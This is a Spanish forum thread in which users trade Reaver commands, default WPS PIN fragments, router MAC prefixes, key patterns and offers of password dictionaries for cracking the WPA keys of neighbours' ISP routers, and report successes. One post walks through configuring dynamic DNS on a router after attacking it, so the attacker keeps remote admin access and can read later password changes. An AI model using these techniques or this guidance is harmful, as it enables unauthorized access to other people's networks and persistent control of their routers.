Publicado por: El_Andaluz en 7 Septiembre 2012, 16:42 pm
No sirve ningun comando que pongas para las orange yo ya lo he probados todo lo unico que se puede hacer es aportar cosas nuevas para poder hacer algo nosotros como he dicho antes si no aportáis no se puede hacer nada con estos router es un coñazo yo también lo di por imposible, la unica forma que veo es que vaya probando con los 4 primeros pine que te den correcto pero ni tampoco la verdad.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 7 Septiembre 2012, 17:01 pm


WPS PIN - 5198

ESSID - vodafonexxxy

MAC - 6a:a8:e4

WPA - 14: 13 letras mayúsculas y 1 número

WPS POR DEFECTO - SI

haber si alguien le sirve esto he buscado
 

Me suenan esos datos!  :laugh:
Yo creo que con las vodafone no hay ningún problema. Las que he podido probar, con su PIN perfectamente activado, ningún router se ha bloqueado y tarde o temprano me ha terminado dando el PIN y su correspondiente clave WPA.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 7 Septiembre 2012, 17:03 pm
SI yo lo he puesto hay por si alguien le sirve yo estos router por donde vivo no los veos mucho depende de la zona pero algunos de estos son un poco complicado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 7 Septiembre 2012, 18:58 pm
se sabe alguna novedad de esta red WLAN_XXXX mac 8C:0C:A3 o nadie la ha conseguido yo estoy con una de estas voy por el 11% a ver que pasa nadie ha tenido exito pero aver si consigo algo bueno aviso con lo que sea elsevi estoy tambien con una orange y ha provado 5 pines y se ha bloqueado cuanto tardara en desbloquearse saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 8 Septiembre 2012, 04:27 am
con una orange-xxxx estas atacando pues te puede tardar  en desbloquearse unos 4 dias depende del router de orange a mi algunos me tarda solo un dia en desbloquearme depende pues si consigues algo goolden avisame


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Nawual en 10 Septiembre 2012, 01:29 am
Entonces habéis terminado de probar las vodafoneXXXX con 5C:4C:A9.... para acortar la búsqueda del pin.Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 10 Septiembre 2012, 02:19 am
WPS POR DEFECTO - SI

Si fuera por defecto el 99,99% de los router con la MAC: 6a:a8:e4 deberían tener ese pin y además debería estar completo para confirmar que es por defecto y que ese pin completo de 8 dígitos sea el mismo en el 99,99% de los router con la MAC: 6a:a8:e4; cosa que no creo que sea por defecto, pueda que algunos tengan el pin comenzando por 5198, pero eso no impide que cambie con alguna versión nueva...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 10 Septiembre 2012, 04:46 am
Pues si es verdad yo esos datos lo he cogido de un foro el pin no lo tienen completo por que se lo tendría que pedir a la persona que ha puesto esos datos, entonces se supone que metiendo esos 4 primeros dígitos te tiene que buscar el pin correcto es verdad que también, sera valido con esa mac : 6a:a8:e4 en algunos router de vodafon yo no lo he probado probarlo algunos de vosotros haber si lo saquéis en mi zona no cojo ninguna de vodafon bueno esto es como todo en algunos router valdra ese pin y en otro no como le pasa a las orange que porbado miles de pin y no he sacado nada.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 10 Septiembre 2012, 20:38 pm
Si fuera por defecto el 99,99% de los router con la MAC: 6a:a8:e4 deberían tener ese pin y además debería estar completo para confirmar que es por defecto y que ese pin completo de 8 dígitos sea el mismo en el 99,99% de los router con la MAC: 6a:a8:e4; cosa que no creo que sea por defecto, pueda que algunos tengan el pin comenzando por 5198, pero eso no impide que cambie con alguna versión nueva...

Yo fui el que puso ese por defecto Sí en otro foro. Al decir WPS por defecto Sí, quiero decir que el PIN viene activado por defecto (por lo menos esa era mi intención). Quiero decir, que no es una falsa activación como pasa con muchos routers de movistar y vodafone que el wash te lo detecta y luego al atacarlo con el reaver te llevas una desilusión  :(


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Septiembre 2012, 13:10 pm
Tu fuiste el que publicaste esos datos sacaste la clave al final dime has sacado alguna orange o no ?'


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 11 Septiembre 2012, 23:24 pm
La única Orange con la que puedo probar, lleva bloqueada más de un mes. IMPOSIBLE.

Me desvío levemente del reaver, para no abrir otro tema, por si alguien me puede decir algo de las redes con nombre Cisco. Son de ONO, no? se sabe algo? Quiero decir, longitud de la clave? numérica, letras y números? Gracias!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Martin-Ph03n1X en 11 Septiembre 2012, 23:41 pm
P4nd3m0n1um ya sabes como hacer raver a una red con filtro mac y oculta
o en cualqualquiera de los casos
o oculta
o con filtro mac

te comento lo del filtro mac ya lo he intentado clonando wlan0 pero no me deja con mon0


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Septiembre 2012, 23:48 pm
Martin-Ph03n1X y eso que tu dices para que sirve me lo puedes explicar lo de filtrar la mac y todo eso sirve para sacar cuallkier clave pregunto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: shocyrix en 11 Septiembre 2012, 23:55 pm
FILTRO MAC PARA elegir CLIENTE EN ESPESIFICO QUE PUEDA HACER CONEXION ... Y OCULTA ES PARA QEU EL SSID NO SEA VISIBLE Y TENGAS QUE PROPORCIONARLO TU MISMO SI LO CONOCES....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Septiembre 2012, 23:57 pm
Haber si lo entiendo es para que no te vean la mac verdad para eso es el filtro ? otra  cosa shocyrix tu has sacado alguna orange-xxxx por curiosidad


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 12 Septiembre 2012, 00:21 am
Es una opción que traen los routers, que activándola, te da la opción de elegir qué MACs quiere que se conecten al router. Si tu MAC está en la lista podrás conectarte al router, si no lo está no (teóricamente).

Por lo tanto si una red ajena a la tuya tiene filtrado MAC activado, es obvio que tu dirección MAC no va a estar en su lista, por lo tanto, no vas a poder, en principio, conectarte.

Saludos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 12 Septiembre 2012, 00:31 am
aam vale gracias por explicarmelo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 12 Septiembre 2012, 03:10 am
Martin-Ph03n1X y eso que tu dices para que sirve me lo puedes explicar lo de filtrar la mac y todo eso sirve para sacar cuallkier clave pregunto.

la verdad es que no tengo idea.. todos los routers que tengo actualmente son de alta gama y ninguno viene con wps.. pero siguiendo al cifrado abría que ver que esta primero si el pin o el filtro de mac, igual según mis creencias estaría primero el wps pues es simplemente un candado de acceso, si tienes el acceso te chocas con el filtro si este es erróneo quedas como espermatozoide.. hasta que cambies de mac..

aam vale gracias por explicarmelo

Algo que de seguro tampoco sabias... muy recomendado. (http://www.arg-wireless.com.ar/index.php/topic,1001.0.html)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Septiembre 2012, 02:18 am
Pues la verdad eso del filtrado mac no lo sabia pero yo pensaba que esto era para ocultar la mac o algo no lo entendi bien la verdad el enlce que me has dado no veo nada solo sale resgistrarse .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: AnonDraven en 13 Septiembre 2012, 16:52 pm
saludos

Por y para ustedes e decidido registrarme en este foro, del cual e obtenido tantisima información, muy de agradecer. He merodeado por las 36 paginas de este post, y revisando otros tantos post en esta, y otras comunidades, y no consigo solucionar mi problema con un router de telefonica, cual e visto por hay que suele dar mucho tipo de coñazos.

Su ESSID por defecto suele ser: WLAN_XXXX

Su MAC: 8C:0C:A3...

E probado con reaver 1.4 con el wifiway 3.4 y si no es por fallos de timeout , o por fallos de associarme con el router nada no consigo hacer nada, alguna vez me a dado el WPS PIN, pero el WPA nada, ni asomarse, algo funciona mal? tambien e probado desde el WPScrackGUI-1.7 creo que se llama, tampoco,

WARNING: Failed associate al (WLAN_XXXX)

Alguna sugerencia o puedo recurrir a otro metodo para descifrar mi nuevo router que si es cierto que es duro, pero quiero averigüar hasta que punto, aunque mis conocimientos son limitados nunca probe un diccionario, aparte de airodump, aircrack y reaver, nose hacer más. Lo dicho a esperar ansioso si algun amante de esto se interesa por el nuevo. Gracias por leer, y gracias sobretodo a P4nd3m0n1um que veo que esta muy pendiente de casi todos, asi que lo dicho. A seguir aprendiendo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 13 Septiembre 2012, 19:19 pm
AnonDraven, alguna medida adicional de seguridad deben tener esos router, que supuestamente son los últimos de tefónica y deja al reaver en un bucle indefinidamente probando el mismo pin, sería interesante que alguien que tuviera dicho router probara con la opción "-p pindelrouter", para ver si escupe la contraseña, porque creo que ni con esas, digamos que lo vacunaron contra el reaver, a los 8c:0c:a3, en términos de salud. Yo mismo probé con alguno que me topé, con el wifislax 4.2, pero nada, 99.99%........hasta el infinito y mucho más. :silbar:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: AnonDraven en 13 Septiembre 2012, 22:11 pm
GRACIAS AMIGO, tu respuesta es alentadora, a ver si alguno me da solucion con algun decrypter, si alguien me da los pasos se lo agradecería  :xD :xD


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Septiembre 2012, 00:57 am
Pues la verdad eso del filtrado mac no lo sabia pero yo pensaba que esto era para ocultar la mac o algo no lo entendi bien la verdad el enlce que me has dado no veo nada solo sale resgistrarse .


(http://i.minus.com/ite7pL3sSbrTD.png)

Lo típico después de terminal de atacar un router es fijar un "DNS dinámico", que es un DNS Dinámico:

DNS dinámico es un sistema que permite la actualización en tiempo real de la información sobre nombres de dominio situada en un servidor de nombres. El uso más común que se le da es permitir la asignación de un nombre de dominio de Internet a un ordenador con dirección IP variable (dinámica). Esto permite conectarse con la máquina en cuestión sin necesidad de tener que rastrear las direcciones IP.
El DNS dinámico hace posible, siendo de uso frecuente gracias a lo descrito, utilizar software de servidor en una com[El Usuario ha Insultado]dora con dirección IP dinámica, como la suelen facilitar muchos proveedores de Internet para particulares (por ejemplo para alojar un sitio web en el ordenador de nuestra casa, sin necesidad de contratar un hosting de terceros).

Otro uso útil que posibilita el DNS dinámico es poder acceder al ordenador en cuestión por medio del escritorio remoto.

Este servicio es ofrecido, incluso de forma gratuita, por No-IP, CDmon y FreeDNS.

Fuente: http://es.wikipedia.org/wiki/DNS_din%C3%A1mico (http://es.wikipedia.org/wiki/DNS_din%C3%A1mico)

Ahora si bien en que nos beneficia esto? simplemente podemos entrar a las configuraciones de un router remotamente sin tener conexión física o inalámbrica a este y saber que configuraciones le ha aplicado el usuario administrador de este mismo.

Entonces en ves de utilizar por ejemplo la IP del router para entrar http://192.168.1.254 en el caso que estemos conectados a este; vamos a usar un dominio ya pre-establecido para acceder a este mismo. Por ejemplo http://thomsonTG782.myvnc.com y entraremos a las configuraciones desde Internet..

Los pasos son simples primero debemos tener una cuenta en No-IP:

1.- Visitamos http://www.no-ip.com/.
2.- Nos registramos por lo general es aquí: "Services -> Managed DNS -> Free DNS" (http://www.no-ip.com/services/managed_dns/free_dynamic_dns.html)
3.- Una ves que tenemos nuestra cuenta, vamos a ir a: Add Host!
4.- Creamos nuestro Host a gusto:

(http://i.minus.com/ibp19bQdMc9EaA.PNG)

Una ves creado el Host vamos a nuestro router, en este caso un Thomson TG782 y visitamos la configuración como Administrador (http://www.arg-wireless.com.ar/index.php/topic,943.msg4001.html#msg4001).

Una ves que estemos dentro vamos a ir a "Herramientas" -> "DNS Dinamico":

(http://i.minus.com/ixCR9mBhb4SKE.PNG)

y Agregamos el nuevo Host que habíamos creado:

(http://i.minus.com/iTIcbfQp2s1wL.PNG)

y ahora si visitamos: "thomsonTG782.myvnc.com" por ejemplo entrariamos a las configuraciones del Router.

(http://i.minus.com/iQvaZhQ7No7Ws.PNG)

Así tenemos control remoto del router sin tener que tener clave de acceso o estar cableado al mismo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Septiembre 2012, 05:14 am
Muchas gracias P4nd3m0n1um por la información que me has dado es necesario una vez aya atacado el router hacer cambiar tu direecion ip normalmente el mismo ordenador cambia la ip sola verdad .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Septiembre 2012, 05:28 am
Muchas gracias P4nd3m0n1um por la información que me has dado es necesario una vez aya atacado el router hacer cambiar tu direecion ip normalmente el mismo ordenador cambia la ip sola verdad .

vamos a explicarlo en español.. Resulta que un día un tío se ligo con el acceso de una WPA2 después de realizar un ataque de 300.000.000 años, configura un DDNS y al pasar los días de la nada el tío no se pudo conectar más... ¡maldición! pues le han cambiado la contraseña.. ningún otra opción le quedaba que morir en realizar un nuevo ataque de fuerza bruta.. pero este tío se acordó que había configurado el DDNS en el router; por lo cual podría acceder desde donde quisiera (este en china o en Bolivia), entra al router y se entera la contraseña sin perder un instante.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: novakcs en 14 Septiembre 2012, 10:45 am
Hola, llevo un par de días probando a sacar la clave de mi propio router con WPS activado.

Es de ONO, y he conseguido que me de el pin, pero nunca saca la clave.
Lo mas gracioso, es que he probado otra vez, poniendo -p xxxx los 4 primeros digitos del pin y entonces me da otro. Y nunca me da la clave.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 14 Septiembre 2012, 11:33 am
dejalo que valla solo desde el principio que te saque el pin correcto no pongas el comando este pin este reaver -i interface -b mac -vv alguien a pogresado con alguna livebox saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: novakcs en 14 Septiembre 2012, 11:38 am
dejalo que valla solo desde el principio que te saque el pin correcto no pongas el comando este pin este reaver -i interface -b mac -vv alguien a pogresado con alguna livebox saludos
Uf, me tardó como 12 horas en sacarme los 4 primeros dígitos.  Estás diciendo que entonces esos no son los correctos???

Es que claro, una vez pongo los 4 primeros, ya empieza desde el 90%

Todo esto ha sido con una tarjeta usb alfa de 2w

Con esta tarjeta y wifiway no me iba bien, me daba muchos errores de conexion y me probaba 1 pin cada minuto o asi, me bajé el backtrack 5 rc3  y entonces puedo ponerle el comando --no-nack  y ya no me da errores (no sabria decirte por que, lei en un foro que con eso, en mi alfa , iria mejor)

Ahora prueba uno cada 9 segundos (otras veces uno cada 21 segundos)

He vuelto a empezar con los 4 primeros digitos, va por el 93%  lo dejaré, si sale, bien, si no, empezare de 0


Alguien tiene idea de por que me dice el pin pero no la clave?
Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Septiembre 2012, 14:16 pm
Vale ya me enterado P4nd3m0n1um .gracias

Goolden : Busca en wireles en  linux tengo puesto yo diccionario para las Orange-xxxx haber si capturando el handshake le pasa los diccionario haber si tienes suerte de todas manera el que quiera que me de su msn y le paso algún diccionario por pribado.

novakcs:TE dice el pin por que lo esta probando hasta que no encuentre el pin correcto no te sacara la clave.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: novakcs en 14 Septiembre 2012, 16:06 pm
novakcs:TE dice el pin por que lo esta probando hasta que no encuentre el pin correcto no te sacara la clave.

No no, prueba todos y al llegar a este, me dice:
pin cracked in x seconds:
wps pin 4301xxxx
nothing done, nothing to save


Lo que pienso que es el último que tenia que probar (aunque no es 9999 , asi que no lo entiendo) y como ya no va tampoco...
Que me recomendais, que empiece desde el principio de nuevo?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 14 Septiembre 2012, 23:13 pm
Vale ya me enterado P4nd3m0n1um .gracias

Goolden : Busca en wireles en  linux tengo puesto yo diccionario para las Orange-xxxx haber si capturando el handshake le pasa los diccionario haber si tienes suerte de todas manera el que quiera que me de su msn y le paso algún diccionario por pribado.

novakcs:TE dice el pin por que lo esta probando hasta que no encuentre el pin correcto no te sacara la clave.

me podrias poner el enlace de los diccionarios orange?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 15 Septiembre 2012, 01:38 am
Hola, llevo un par de días probando a sacar la clave de mi propio router con WPS activado.

Es de ONO, y he conseguido que me de el pin, pero nunca saca la clave.
Lo mas gracioso, es que he probado otra vez, poniendo -p xxxx los 4 primeros digitos del pin y entonces me da otro. Y nunca me da la clave.

cambia la versión del reaver..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 15 Septiembre 2012, 01:45 am
Uf, me tardó como 12 horas en sacarme los 4 primeros dígitos.  Estás diciendo que entonces esos no son los correctos???
Gracias.

yo tarde 30 dias.. parece poco..

Todo esto ha sido con una tarjeta usb alfa de 2w

RTL3070 no tiene soporte.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 15 Septiembre 2012, 07:46 am
Obtenido con éxito el pin y la clave wpa-psk de un router vodafoneXXXX.....empezé a las 11 pm y he dejado rulando mi viejo portátil toda la noche.....añadir que no llegó al 100% sino al 92,76   ;-)
Lo curioso es que tengo la alfa de marras(tremenda antena),pero me dió por probar otra antena que me regalaron hace 2-3 años y ha aguantado toda la noche sin fisuras....
No sé ni qué marca es(pone en el cartón WGUSB-ANT)...pero funciona, tiene una potencia de transmisión de 23 db y  le he añadido una antena externa...el chipset es el bendito RTL8187  :laugh:
Se puede observar que el consumo de recursos es ínfimo,ni uso de cpu ni ram(es un pentium IV,con 756 mb de ram y antiquísimo)..... lo hize rular en XUBUNTU 10.10.....
A las 6.06 am obtuvo la clave,o sea...unas 7 horas en total....empecé instalando el reaver a las 11pm. por probarlo sin tener que usar las distros que hay en modo live y bueno,parece que funciona...
Esta noche probaré con otro...a ver si ha sido casualidad  :silbar:

(http://imageshack.us/a/img222/2763/vodafonexxxx.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 15 Septiembre 2012, 10:21 am
cual es la mac de esa voadafone darnos mas datos sobre la red saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: novakcs en 15 Septiembre 2012, 10:22 am


RTL3070 no tiene soporte.



Qué? así que me puedo volver loco intentándolo y no va a salir nunca? :(

Pues qué tarjeta me recomendais relacion calidad-precio   a poder ser muy barata! ;)

Gracias.

Actualizo:
Hago la prueba con otro router mio que tengo, de movistar el nombre por defecto era WLAN_XXXX (pero yo lo cambie) , por defecto tiene el WPS activado (con la clave 12345670 que bien), yo lo teniía desactivado, pero para probar lo he activado.
Me saca la clave en 3 segundos, pin, clave y todo, perfecto.

con el ONO con el que estoy probando ahora, nada, solo el pin.

 


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 15 Septiembre 2012, 12:37 pm
el sevi los diccionarios de livebox, ¿crees que servirian para las redes que se llamen orange?? Ya se que las livebox pertenecen a orange pero al no tener el mismo essid ya no se......


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 15 Septiembre 2012, 12:39 pm
magp que tenias el pin desactivado del router tecom y lo has activado por que no viene el pin asignado por defecto


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 15 Septiembre 2012, 14:49 pm
magp que tenias el pin desactivado del router tecom y lo has activado por que no viene el pin asignado por defecto

no te he entendido.....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 15 Septiembre 2012, 15:09 pm
cual es la mac de esa voadafone darnos mas datos sobre la red saludos

La mac es 62:C0:6F:XX:XX:XX DE vodafone_XXXX... wpa CCMP psk


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 15 Septiembre 2012, 15:43 pm
magp_90 : Hola buenas a tu respuesta si sirvieran o no es cuestión de suerte, yo los que me baje por Internet son los mas parecido posible a la clave que viene por defecto, del router normalmente la gente le cambia la clave y hay gente que no, otra cosa el essid aveces esta el mismo que viene y no lo cambian y esta cambiada la clave pero esto es cuestión de suerte prueba los diccionario que yo tengo puesto en la parte de linux o mándame un mensaje por privado y ya te paso yo otro diccionario para que me diga si te vale o no ? Todo esto diccionario esta echo como posibles clave por defecto del router .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 15 Septiembre 2012, 15:49 pm
elsevi sabes algo de estas redes de orange es una FTE-XXXX con esta mac 00:26:91 y no tienen el wps activado es un sagem el router y te preguntaba si sabes diccionarios de estas redes y mas informacion


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 15 Septiembre 2012, 15:50 pm
La mac es 62:C0:6F:XX:XX:XX de vodafone_YXXX... wpa CCMP psk.....donde Y es una letra mayúscula y X un número.

Olvidé mencionar un detalle....la clave consta de 14 letras en MAYÚSCULA,o sea,de la A-Z...me pregunto si existirá un diccionario con todas las posibles variables de 14 letras en mayúscula....si así fuese creo que sería mucho más rápido el proceso....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 15 Septiembre 2012, 16:16 pm
malamadre67 De Todas manera existe un programa de diccionario para vodafon echo por jesus betis solo tenéis que buscarlo y bajárselo y probar haber si tenéis suerte con las de vodafon por cierto mucha suerte has tenido en sacar la clave haber si eres capaz de sacar alguna Orange-xxxx WPA2 dado que son casi imposibles te lo agradecería que pusiera aquí hasta el vídeo o imágenes y todo para que no lo creceremos como has echo con la de vodafon si no te importa claro.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 15 Septiembre 2012, 19:09 pm
Cierto es que he tenido mucha suerte,más que nada porque la curiosidad me hizo probar este programa ...leí que reaver era perfecto para ubuntu 10.10 y sus variables.....así que descargué e instalé y poco más....al ver que rulaba con este vodafone decidí dejarlo a su bola toda la noche y el resultado ha sido pleno.
Probando distintos AP's lo cierto es que se asocia con casi todos,algunos de ahí no pasa y otros se tira mandando el mismo pin en un bucle infinito y claro,hasta aquí llego...he leído sobre el wps activado y tal,pero eso ni lo comprobé...supongo que será lo que ocurre en estos casos,de ahí que no pueda avanzar.... 
Respecto al diccionario que mencionas,si sólo contemplase esas permutas de sólo letras y en mayúsculas....si el patrón es lo que aparenta,pues otro router más que añadir a la "blacklist"  >:D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 15 Septiembre 2012, 21:02 pm
Olvidé mencionar un detalle....la clave consta de 14 letras en MAYÚSCULA,o sea,de la A-Z...me pregunto si existirá un diccionario con todas las posibles variables de 14 letras en mayúscula....si así fuese creo que sería mucho más rápido el proceso....

Pues, según se dice aquí:

http://foro.seguridadwireless.net/desarrollo-112/para-los-adictos-al-%27brute-force%27/

Citar
si atacásemos un router vodafone con sus 14 letras mayusculas y numeros a un promedio de 500 hashes por segundo en aircrack-ng:
El número de combinaciones posibles es: 6.1409422144648E+21
El tamaño del diccionario es de: 92114133216.97 TeraBytes
Tiempo estimado en procesar el diccionario: 389456000410 años

Fuente:
http://foro.seguridadwireless.net/desarrollo-112/para-los-adictos-al-%27brute-force%27/


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 15 Septiembre 2012, 22:08 pm
Y si son sólo 14 letras mayúsculas:

El número de combinaciones posibles es: 6.45099747033E+19
El tamaño del diccionario es de: 967649620.55 TeraBytes

Fuente:
http://www.bitsdelocos.es/computo.php


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 15 Septiembre 2012, 23:13 pm
Ya....pero  hablaba de un patrón(por ej.no aparece ninguna letra entre la A y la E,lo cual elimina 5 letras,o sólo una vocal y el resto consonantes)...como el que siguen la mayoría de los routers que son vulnerables,....de lo contrario multiattack no sería tan rápido.
Esa información ya la leí hace tiempo(vinculada a pyrit),por eso digo que lo hize por curiosidad a ver cómo rula reaver...
En cualquier caso,seguiré probando el programa  >:D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: novakcs en 16 Septiembre 2012, 11:58 am
Ya que con la anterior ONO solo me dio el pin, estoy intentando con otra.

Me da muchos errores de asociacion:
warning: failed to associate with xx:xx:xx

aunque luego se asocia y sigue... pero claro, pierde muuuucho tiempo.

He probado cuando ya da muchisimos errores warning de estos, a paararlo, dejarlo "descansar 5 o 10 minutos, continuo, y entonces durante un montón de rato no da mas errores de asociacion.
Cambio el -d x  con varios tiempos: 5, 10, 15... pero hasta con 15 me acaba dando errores alguna vez (y encima va muuuuuy lento el proceso) 
Asi que lo dejo en 5
Voy por el 46% (si, aun no ha encontrado los 4 primeros) y  llevo ya 24 horas casi.

P.D. El hilo este no era para reaver y vulnerabilidad por wps???? ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 16 Septiembre 2012, 12:25 pm
Lo es  ;)

Pero como el compañero había preguntado por la posibilidad de un diccionario con todas las posibles combinaciones de 14 mayúsculas, de ahí la respuesta.

(Off-topic: las Vodafone, ahora mismo, sólo son atacables mediante WPS, no se ha publicado ningún patrón en las claves WPA, hace tiempo se dijo que un grupo se había aproximado al algoritmo con una buena precisión, pero a saber si era verdad, y en cualquier caso no han publicado, que yo sepa, su trabajo.)


Volviendo al hilo:

@novakcs: ¿qué versión de reaver usas?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 16 Septiembre 2012, 17:31 pm
hola los router vodafone es cambiante que un dia no tenga el wps activado y cuando pasa x tiempo se activa o se activa solo o lo activan saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 16 Septiembre 2012, 18:00 pm
Alguno sabeis el ping por defecto de los roueters cuya mac empiezan por 00:27:19:xx:xx:xx


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 16 Septiembre 2012, 18:05 pm
que tipo de router el nombre


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 16 Septiembre 2012, 18:07 pm
ahh vale un tp-link no lo conozco averigualo con reaver desde el principio y veras como lo encuentra


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 16 Septiembre 2012, 18:11 pm
sabeis el pin de la vodafone con esta mac 64:16:f0 o alguien se ha topado con alguna y ha realizado el ataque y ha conseguido el pin y la clave


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 16 Septiembre 2012, 21:49 pm
router 8c:0c:a3:x:x:x, con wifiway 3.4, reaver 1.3, mismo resultado, bucle indefinido con un mismo pin, cuando llega al 99.99%, invulnerables, 100% diría yo, saludos, a seguir investigando compañeros. :rolleyes:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 16 Septiembre 2012, 21:54 pm
AnonDraven, alguna medida adicional de seguridad deben tener esos router, que supuestamente son los últimos de tefónica y deja al reaver en un bucle indefinidamente probando el mismo pin, sería interesante que alguien que tuviera dicho router probara con la opción "-p pindelrouter", para ver si escupe la contraseña, porque creo que ni con esas, digamos que lo vacunaron contra el reaver, a los 8c:0c:a3, en términos de salud. Yo mismo probé con alguno que me topé, con el wifislax 4.2, pero nada, 99.99%........hasta el infinito y mucho más. :silbar:

que utilizas en el wifislax 4.2, el reaver desde consola o desde alguna aplicación?



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 16 Septiembre 2012, 22:54 pm
Esta vez he utilizado el wifiway 3.4 y el reaver 1.3, eliminando el reaver 1.4, suprimiendo el módulo06 wireless y agregando los modulos "reaver 1.3", "salvar sesion reaver". Con el wifislax 4.2, desde consola directamente, no he utilizado aplicación gráfica, creo más en los comandos desde consola sin intermediarios gráficos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: novakcs en 16 Septiembre 2012, 23:02 pm

Volviendo al hilo:

@novakcs: ¿qué versión de reaver usas?

La 1.4, del backtrack 5 rc3

Bueno, tengo nueva y buena información.
en ningun sitio consegui encontrar información respecto a lo de que me saque el pin y nada mas...  pero en otras redes si.

Así que teniendo el pin apuntado, se me ha ocurrido probar con la wifi del portatil, que tiene una atheros con muy poca potencia, pero he salido a la terraza, he puesto el reaver con el comando -p xxxxxxxx   (con el pin que me habia sacado mi tarjeta alfa)  y 3 SEGUNDOS Y CLAVE! :D
jejeje


Podria ser una solucion a los que les pasa como a mi... si teneis una antena potente, pero que sólo da el pin, apuntadlo, sacais el portatil a la ventana o lo que sea y luego probais con otra con menos potencia y el comando -p

:D
He sacado 2 onoxxxx en 6 segundos :D jeje



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 16 Septiembre 2012, 23:14 pm
Esta vez he utilizado el wifiway 3.4 y el reaver 1.3, eliminando el reaver 1.4, suprimiendo el módulo06 wireless y agregando los modulos "reaver 1.3", "salvar sesion reaver". Con el wifislax 4.2, desde consola directamente, no he utilizado aplicación gráfica, creo más en los comandos desde consola sin intermediarios gráficos.

Échale un ojo, aunque no te gusten los entornos gráficos, las opciones por defecto son interesantes

 http://foro.seguridadwireless.net/index.php?topic=47329.msg251555.msg#25155


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 17 Septiembre 2012, 00:14 am
